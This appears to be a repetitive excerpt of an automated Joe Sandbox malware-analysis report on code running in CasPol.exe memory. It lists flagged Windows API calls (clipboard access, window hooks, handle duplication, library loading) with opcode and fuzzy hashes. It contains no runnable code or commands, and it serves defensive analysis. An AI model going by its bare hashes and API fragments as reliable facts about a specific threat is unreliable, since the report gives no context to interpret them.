• Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
Similarity
• API ID: CallProcWindow
• String ID: xh
• API String ID: 2714655100-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 637ea0c-637eb18; calls OleGetClipboard)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
Similarity
• API ID: Clipboard
• String ID: xh
• API String ID: 220874293-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 637ea18-637eb18; calls OleGetClipboard)
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
Similarity
• API ID: Clipboard
• String ID: xh
• API String ID: 220874293-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 6375f81-6376042; calls DuplicateHandle)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0637600F
Strings
Memory Dump Source
• Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: xh
• API String ID: 3793708945-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 6375f88-6376042; calls DuplicateHandle)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0637600F
Strings
Memory Dump Source
• Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
Similarity
• API ID: DuplicateHandle
• String ID: xh
• API String ID: 3793708945-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 64d2150-64d2209; calls SetWindowsHookExA)
APIs
• SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064D21D3
Strings
Memory Dump Source
• Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
Similarity
• API ID: HookWindows
• String ID: xh
• API String ID: 2559412058-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 64d2158-64d2209; calls SetWindowsHookExA)
APIs
• SetWindowsHookExA.USER32(?,00000000,?,?), ref: 064D21D3
Strings
Memory Dump Source
• Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
Similarity
• API ID: HookWindows
• String ID: xh
• API String ID: 2559412058-34918151
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph: rendered graph not reproduced (basic blocks 64dc178-64dcc35; calls LoadLibraryExW)
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,064DCB71,00000800), ref: 064DCC02
Strings
Memory Dump Source
• Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
Similarity
• API ID: LibraryLoad
• String ID: xh
• API String ID: 1029625771-34918151
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,064DCB71,00000800), ref: 064DCC02
Strings
Memory Dump Source
• Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
Similarity
• API ID: LibraryLoad
• String ID: xh
• API String ID: 1029625771-34918151
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0687E647
Strings
Memory Dump Source
• Source File: 00000001.00000002.578665147.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_6870000_CasPol.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID: xh
• API String ID: 1890195054-34918151
                                                              • Opcode ID: 837d316bfe48a28095d1256e67865fe1dbd21f4e745c48097416c4962d37b047
                                                              • Instruction ID: 3538430edff10da9b08853fbcd720174f69203ffcb53e527c21e88954f3e2ca9
                                                              • Opcode Fuzzy Hash: 837d316bfe48a28095d1256e67865fe1dbd21f4e745c48097416c4962d37b047
                                                              • Instruction Fuzzy Hash: 5711D0B1D0061A9BCB10CF9AC944BDEFBB4AB48720F14816AD518B7640D378AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 063711D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: xh
                                                              • API String ID: 4139908857-34918151
                                                              • Opcode ID: cc0de88703e29f1d20fab42218f376335031fd9fbce09f8313e718153f706bab
                                                              • Instruction ID: 8e9c562292b2fcbf993f24fa6bb7967ca732ec5f5ffb6e82042a512d9414adc9
                                                              • Opcode Fuzzy Hash: cc0de88703e29f1d20fab42218f376335031fd9fbce09f8313e718153f706bab
                                                              • Instruction Fuzzy Hash: 651102B6C002098FCB20CF9AD844BDEFBF4EB88324F14852AD419B7600C379A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 063711D6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: xh
                                                              • API String ID: 4139908857-34918151
                                                              • Opcode ID: 359f8552ff91a2afe683eaabc8e131a234bab2747ff332be36d8c6db6c7ac075
                                                              • Instruction ID: f77f804aeca8a54df1c499a9e6c79416f9f6fb3a5b20e5661d0d73d7db5640b6
                                                              • Opcode Fuzzy Hash: 359f8552ff91a2afe683eaabc8e131a234bab2747ff332be36d8c6db6c7ac075
                                                              • Instruction Fuzzy Hash: CB11D2B6C002498FDB20CF9AC844BDEFBF4EB89724F14852AD459B7610C379A545CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 0637BE97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: xh
                                                              • API String ID: 2492992576-34918151
                                                              • Opcode ID: 1195d98d47d57bfe0f1eb9cfb52772488066eca489b64b7a22d0c4d01f9065af
                                                              • Instruction ID: cf3291f151f4a4426c60c3fd005ba3a6efee4cdb072aab163be32cb3db8f23ae
                                                              • Opcode Fuzzy Hash: 1195d98d47d57bfe0f1eb9cfb52772488066eca489b64b7a22d0c4d01f9065af
                                                              • Instruction Fuzzy Hash: 7011F5B59002498FCB60CF9AD588BDEFBF8EB48324F20845AD519B7700C379A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 0637E7E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: xh
                                                              • API String ID: 2538663250-34918151
                                                              • Opcode ID: bb83b8efc07666d5885ba7465b6a11cc02ec9f15ad751047f969414253d5f0ab
                                                              • Instruction ID: ee2db29d3977d1f51cbc09ebc94b5369fc829aa77f0eb8d1edf907470669924d
                                                              • Opcode Fuzzy Hash: bb83b8efc07666d5885ba7465b6a11cc02ec9f15ad751047f969414253d5f0ab
                                                              • Instruction Fuzzy Hash: 9B1103B5D003498FCB60CF9AC488BDEBBF4EB48324F20845AD459B7600C378A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?), ref: 0637BE97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID: xh
                                                              • API String ID: 2492992576-34918151
                                                              • Opcode ID: c6857ff89a62ff330cf5a5c5495ee6cb651a13c825fbfd8af32670ad181b9a93
                                                              • Instruction ID: aff6f0f9f2f66c106536a7379856fe0cb9404472f261dd3ae58a79a57ca60a37
                                                              • Opcode Fuzzy Hash: c6857ff89a62ff330cf5a5c5495ee6cb651a13c825fbfd8af32670ad181b9a93
                                                              • Instruction Fuzzy Hash: 301106B5C002098FCB50CF9AD584BDEFBF4EB48324F20845AD519A7710C775A544CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 0637E7E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: xh
                                                              • API String ID: 2538663250-34918151
                                                              • Opcode ID: 8d604bf70c61702bed89437e459d092b47f7ab28ac755760aa2e23738da6ca74
                                                              • Instruction ID: 1a8370654bf5908c9f6c4ef55f5c72cb0ab758f07b505466b4e2cea99ff245bd
                                                              • Opcode Fuzzy Hash: 8d604bf70c61702bed89437e459d092b47f7ab28ac755760aa2e23738da6ca74
                                                              • Instruction Fuzzy Hash: 181115B5D00249CFCB50CF9AD588BCEBBF4EB48324F248559D519A7600C378A544CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6d809226507fde99f9d8cf9b3e65eaae42b569944e084e64f958d206fb46a83
                                                              • Instruction ID: d936656ec45b69cf5c22e85208248031c4eada9f61159e4e2a657ea2b10562f5
                                                              • Opcode Fuzzy Hash: d6d809226507fde99f9d8cf9b3e65eaae42b569944e084e64f958d206fb46a83
                                                              • Instruction Fuzzy Hash: 892167B1508240EFDB01CF18DCC0BA7BF65FB84324F248669E8452B206D336D846D7A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b8e08026944035d746bc0b7183d2e13d9ba6c5569e389f9758422536e77c165e
                                                              • Instruction ID: d59691bb1271802a7c304b5c6c97fb69a0caea6aee58453339010078a80b87cb
                                                              • Opcode Fuzzy Hash: b8e08026944035d746bc0b7183d2e13d9ba6c5569e389f9758422536e77c165e
                                                              • Instruction Fuzzy Hash: B0216771508240DFCB25CF04DDC0B97BFA5FB88328F208669E8051B206D336D846DBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575228993.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ecd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e32cb5c6cbfe5af708e619a25606c058f844d010124a5a39e061615a43a6f01
                                                              • Instruction ID: ccf6cbf441dcb04227549247f434aa1e47546793659fe301b42c0f26bb216862
                                                              • Opcode Fuzzy Hash: 2e32cb5c6cbfe5af708e619a25606c058f844d010124a5a39e061615a43a6f01
                                                              • Instruction Fuzzy Hash: B9215E7150D7C09FD7038F24D990B11BF71AB46214F2985EBD8848F6A7C37A984ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575228993.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ecd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 014619529984b16784eefa604c5ad76f67bf187e3a2f1e4a7aa1ea1462ff68ae
                                                              • Instruction ID: 565a96fec51344e4888ef61c77823a1736b74f9b4a34b1550d41dd37e7da3b61
                                                              • Opcode Fuzzy Hash: 014619529984b16784eefa604c5ad76f67bf187e3a2f1e4a7aa1ea1462ff68ae
                                                              • Instruction Fuzzy Hash: 4221FF71508240AFCB11DF18DAC1F26BBA6EB84318F24CA7ED84A1A246C337D847DA61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction ID: fc32ee8b2d87713e08a02adbb72f5fbfba025e92b2aaad8bba3287bb90fea063
                                                              • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction Fuzzy Hash: 0811E676504284CFCB16CF14D9C4B56BF71FB84324F28C6A9DC441B616C336D856CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction ID: a446e4b8bb9b2e5116a06bc6979f518825410fc8e91f8ef888b283004f53fc93
                                                              • Opcode Fuzzy Hash: b3d282c62180620417641dd9b9a0e49e7b7255b4f86f8dc055538552fd58bc37
                                                              • Instruction Fuzzy Hash: 5E11E676504280CFCB16CF14D9C4B56BF71FB94328F24C6A9D8451B616C33AD856CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fd861e18cf4fbb03d5940f489e7866efc7753eadc87823466709692ad52b933
                                                              • Instruction ID: f0424c10275202a1b65caa62fcda9dca34eabd159b8a696a7710b3a37c69b6bf
                                                              • Opcode Fuzzy Hash: 2fd861e18cf4fbb03d5940f489e7866efc7753eadc87823466709692ad52b933
                                                              • Instruction Fuzzy Hash: 9E012B7190C344AAE7154A19DC847E3BFD8EF41735F18951AED052F292D379DC40D6B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.575198224.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_ebd000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b6aef435a9a317e37296b4a08a18680bfe14bf111ab955ba5eabee978f5cf0c
                                                              • Instruction ID: f6aabd44588616ceec7f9627de4fd13866027ff47063509845308b8c640273eb
                                                              • Opcode Fuzzy Hash: 2b6aef435a9a317e37296b4a08a18680bfe14bf111ab955ba5eabee978f5cf0c
                                                              • Instruction Fuzzy Hash: C6F0C8719043449EE7158A05CC84763FFA8EF41735F18C55AED081F282C3759844CAB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e1b244bfba568e238b8c4c46a29f5ef3353e4e1457cd0134664a4b55f40fd60
                                                              • Instruction ID: 5d039290acdf412bff08a0f4058fba7a6497ad194d37f8462101cf5ac91a5741
                                                              • Opcode Fuzzy Hash: 2e1b244bfba568e238b8c4c46a29f5ef3353e4e1457cd0134664a4b55f40fd60
                                                              • Instruction Fuzzy Hash: 5712D7F1412746EAE710DF66E8981893B71F74532AB904308D2B12BAD9D7BE1DCACF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578397608.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_64d0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1450c1159fba8441a0f5bc114cbe1f17fb27b3c272790e3e17b48705b84c3778
                                                              • Instruction ID: 2dd675040a6e80e561ba8999935065e4edbf4005fcf1684e57bea64b53b90106
                                                              • Opcode Fuzzy Hash: 1450c1159fba8441a0f5bc114cbe1f17fb27b3c272790e3e17b48705b84c3778
                                                              • Instruction Fuzzy Hash: 61A18C72E10219DFCF46DFA5C8545EEBBB2FF84300B16816AE815AB320EB35E945CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93c06210da9ff705ed28fd747cd2366119991979a6eec905bf15ef28e8a7060d
                                                              • Instruction ID: a0d6d34d12943f875cec8988d40b81ce0dfcf0c1254f4a2d7ed511826d4a039b
                                                              • Opcode Fuzzy Hash: 93c06210da9ff705ed28fd747cd2366119991979a6eec905bf15ef28e8a7060d
                                                              • Instruction Fuzzy Hash: 82C12BB1812746EBD710DF66E8881893B71FB85326F504309D1B16B6D8D7BE28CACF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%